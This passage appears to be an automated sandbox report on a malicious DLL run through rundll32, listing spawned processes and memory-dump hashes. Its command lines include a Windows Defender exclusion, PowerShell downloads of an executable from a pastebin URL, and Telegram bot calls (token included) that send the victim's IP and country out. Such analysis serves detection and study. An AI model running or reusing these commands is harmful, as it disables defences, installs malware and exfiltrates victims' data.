Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:47:01
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:47:01
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:47:03
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:47:03
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
Imagebase:	0x750000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:47:03
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:47:04
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
Imagebase:	0x550000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:47:04
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7356, Parent PID: 7348

General

Target ID:	16
Start time:	06:47:04
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:47:07
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:47:07
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:47:10
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:47:10
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:47:21
Start date:	23/11/2024
Path:	C:\Windows\Temp\zbjnkzvo4cc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\zbjnkzvo4cc.exe"
Imagebase:	0x400000
File size:	716'800 bytes
MD5 hash:	1D08526FC81B1D62195F4E5DEA52BB6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:47:22
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:47:22
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x460000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:47:23
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
Imagebase:	0x980000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:47:24
Start date:	23/11/2024
Path:	C:\Windows\Temp\mxtvcgq32fe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\mxtvcgq32fe.exe"
Imagebase:	0x540000
File size:	716'800 bytes
MD5 hash:	1D08526FC81B1D62195F4E5DEA52BB6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:47:24
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:47:25
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
Imagebase:	0x980000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:47:52
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:47:52
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:47:54
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:47:54
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:48:01
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:48:01
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:48:03
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	06:48:03
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:48:14
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:48:14
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:48:16
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:48:17
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 047009F0 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

lo7p, xrefs: 04700A35
d7p, xrefs: 04700A1E

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID: lo7p$d7p
API String ID: 0-3642153419
Opcode ID: d6735f644f47bde6892effe24b938490e48d7fd8c5ef929ced987d6b26ddfaa1
Instruction ID: 332315825b1564f8d8558dbf07ce54bbcb9fa055009e32cec0d8474c9f13e130
Opcode Fuzzy Hash: d6735f644f47bde6892effe24b938490e48d7fd8c5ef929ced987d6b26ddfaa1
Instruction Fuzzy Hash: B8216074B11104DFCB04DF68E598AAD7BF2FF8C614F218069E402EB3A1CB75AC059B50

Function 04700A00 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

lo7p, xrefs: 04700A35
d7p, xrefs: 04700A1E

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID: lo7p$d7p
API String ID: 0-3642153419
Opcode ID: 21e88f94c922d13a2f0dea0fad4b830d0fe496afd34b733c766e166744266361
Instruction ID: 75073b62df08502d650dc83024d8f4fe61baec1e104a47dffaa3e1f232f32287
Opcode Fuzzy Hash: 21e88f94c922d13a2f0dea0fad4b830d0fe496afd34b733c766e166744266361
Instruction Fuzzy Hash: 58213874B11208DFCB54DF69D598A6D7BF6FF8C610F208069E802EB3A1DB75AC009B50

Function 04701209 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa2e2dab3e76676fcd7dd8861eb0bf229c0d08e4e8d97175e0a446e4eb196e5
Instruction ID: 4325083e62919a03176ceeee34a58f6a1fb5c7190cb2d463235f4908bd3ad07d
Opcode Fuzzy Hash: baa2e2dab3e76676fcd7dd8861eb0bf229c0d08e4e8d97175e0a446e4eb196e5
Instruction Fuzzy Hash: 9DE02B3260C294AFCB015F64F86845D3F75EFD626130C40EBE895CB293C9384D16E792

Function 04700B37 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ddf8e7c8a376924f9338a83888408ec3564c69d98800f87f13bffa31f79ff7
Instruction ID: 68f199ea90c361adf649636f3a1fe68b17af44b025ab2c6fdcc7886f1dad62b2
Opcode Fuzzy Hash: f3ddf8e7c8a376924f9338a83888408ec3564c69d98800f87f13bffa31f79ff7
Instruction Fuzzy Hash: 69515C74B102118FDB44DB38D854A6E7BF6BFC8610B2584A8E906DF3B5DE35EC428B90

Function 04700B48 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a482617e590651f58beecd8f870d80ce74d9c2fcccf9097047a8e0345601ad
Instruction ID: 2fab453193b7fee05b7a767c59ef412c317a6822cd067c4465d352467c5257f0
Opcode Fuzzy Hash: 70a482617e590651f58beecd8f870d80ce74d9c2fcccf9097047a8e0345601ad
Instruction Fuzzy Hash: FB515B74B102158FDB44EB39D855B2E7BF6BFC8614B2048A8E906DB3B5DE75EC018B90

Function 04701630 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1499caf2584ec7bc0da966672bd5d6aed52be50793c71a1183c7d7a1299ea776
Instruction ID: 048f6ccb250a37b50e3b3552c0c27d1ecfe7dff17306b2b1d4aec58d8a76326d
Opcode Fuzzy Hash: 1499caf2584ec7bc0da966672bd5d6aed52be50793c71a1183c7d7a1299ea776
Instruction Fuzzy Hash: 7C51D4347102548FDF0A9B74C81436E7EF7ABC9704F148029E8069B7E5DF7A6C829B91

Function 04701892 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572e3fa4c50ca3daaeef403b2c826ea4ad38c88e3d49985db9c86c9bccfc30ee
Instruction ID: b75bf282d26404780d7c47a6b5880c2e9e38c931a74307dec58c3b08d11c7b35
Opcode Fuzzy Hash: 572e3fa4c50ca3daaeef403b2c826ea4ad38c88e3d49985db9c86c9bccfc30ee
Instruction Fuzzy Hash: 2A31E5747203249FDB062B78981576F7EFBEBC9702F104029A90A973A5CF385D81A7A1

Function 04700838 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f7d8733cbe964704aaced9b75fc87ad3fe1f19789ad644185ee2e63f64ae5e
Instruction ID: 7df38162b2cf4dd4ea4656256ab568ded48a49382ec079b79b401b95f5000c1b
Opcode Fuzzy Hash: 80f7d8733cbe964704aaced9b75fc87ad3fe1f19789ad644185ee2e63f64ae5e
Instruction Fuzzy Hash: A341E874E10219DFCB44DFA8E98599DBFB6FF48301B108969E815AB365DB30AD42CF50

Function 04700848 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0be0a98fb8bdd1762393f3b90a979fbecfd9490dbe6ee8a410b5db5cc82997
Instruction ID: 131c76d0f23f7804a93edacd1f1be6936a6d9ca9f07f5dad6a72dff63e6883d5
Opcode Fuzzy Hash: 2c0be0a98fb8bdd1762393f3b90a979fbecfd9490dbe6ee8a410b5db5cc82997
Instruction Fuzzy Hash: E041D778E10219DFCB44DFA8E98199DBBF6FF48301B108969E815AB364DB30AD42CF50

Function 04701A09 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee95a1874a5e528f59ede1f5966b4036d3e8b48863a32d9394d2f28cf32e3871
Instruction ID: cdc35ce23f0028cbef6b5459aae71036452d25ee0eb4995cbb1d5c8522e6f532
Opcode Fuzzy Hash: ee95a1874a5e528f59ede1f5966b4036d3e8b48863a32d9394d2f28cf32e3871
Instruction Fuzzy Hash: 10217C70604254CFDB24DB68D4547DE7BF2AF89308F10446CD44AAB3A1DBBAAC44CBA1

Function 04701A18 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11a78c7a20c2b55c683ef2e136712be5d4bcf14c96b8330483e18c6f0c43cde
Instruction ID: affce905c3c97a967ed398cec14a09f47f2dd73d7f75073e909274cda94c386f
Opcode Fuzzy Hash: a11a78c7a20c2b55c683ef2e136712be5d4bcf14c96b8330483e18c6f0c43cde
Instruction Fuzzy Hash: 59214A70604254CFDB15DB68C854B9E7BF2AF89308F50456DD406AB3A1DFB6AC44CBA1

Function 045AD01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633604083.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_45ad000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a963440bc275092a9d242f90892cc3635afd136068c3c6e7b35ba3cf6f438e
Instruction ID: a9183f3f603ee14a3651e3865e601d505a7e614628c80be009edab5dadee03bc
Opcode Fuzzy Hash: c8a963440bc275092a9d242f90892cc3635afd136068c3c6e7b35ba3cf6f438e
Instruction Fuzzy Hash: 0B1106B06043449FDB10FF24F984B2ABBB6F744714F208A6DD50A4B641E23AE45BD661

Function 045AD006 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633604083.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_45ad000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7330a405f4a0355325d97179d7176dd3f38cd755a112fb3ff83a74fa425b3479
Instruction ID: 2465898db9f335f00466cc837ac425fe4cd96d686bf16ba22f502be0112bb4b8
Opcode Fuzzy Hash: 7330a405f4a0355325d97179d7176dd3f38cd755a112fb3ff83a74fa425b3479
Instruction Fuzzy Hash: 6F1191715093C48FDB12EF24E584719BF71FB42214F2486EAC4898B6A3D33E945AC762

Function 04701580 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9471e1160f86ea9daf56ff3960a1003e2bb84c90c1e7cf299526853dfc59ad
Instruction ID: f02dda4563c5e679de0571924a5531ef16fcd20a7da0327db5fce8e59d721334
Opcode Fuzzy Hash: dc9471e1160f86ea9daf56ff3960a1003e2bb84c90c1e7cf299526853dfc59ad
Instruction Fuzzy Hash: 68119A30505346DFDB01EB24D84579ABBF6AB00309F188998E8055F392DBB7A947CBE1

Function 04700D35 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89eb01d09abde9538e3aecff9f188451448365f4ad816e988e39786a0324debf
Instruction ID: d1f33fa3350bae2165f16887d44a5ef97dc84e360dbc42682fb4c7bab10f4d71
Opcode Fuzzy Hash: 89eb01d09abde9538e3aecff9f188451448365f4ad816e988e39786a0324debf
Instruction Fuzzy Hash: BBF02331746344EFDB154628AC197A97FE1EFC5331F044092E614CF3D7C65078498260

Function 047009B0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a3725d0d2f2ab66a69581628833824830eb8d9ce747c16a24f063806657752
Instruction ID: b57b99ac50d26fda12bc47bfab8bb929febd2ff1d0f38f2d1b38b19cd4ac6d5c
Opcode Fuzzy Hash: 35a3725d0d2f2ab66a69581628833824830eb8d9ce747c16a24f063806657752
Instruction Fuzzy Hash: D7E02631B511240FC700973CA4404CC77D5EF856203124AB2E905CB725D92CCC1307C1

Function 04701843 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d08f4aee869b063015b9ab44f488a7cfaa2ce6ac86c4227683d232fb691dc9
Instruction ID: 6215b3b4bdb879327b2bd523fed2ccaa63d296d31c4aaabe60f4c1d34827d8a9
Opcode Fuzzy Hash: c0d08f4aee869b063015b9ab44f488a7cfaa2ce6ac86c4227683d232fb691dc9
Instruction Fuzzy Hash: 28E092303087A58EEB21E3B8A4003CDBBE29F85319F0049ADC1465B681CBB7BD4487A2

Function 04701548 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

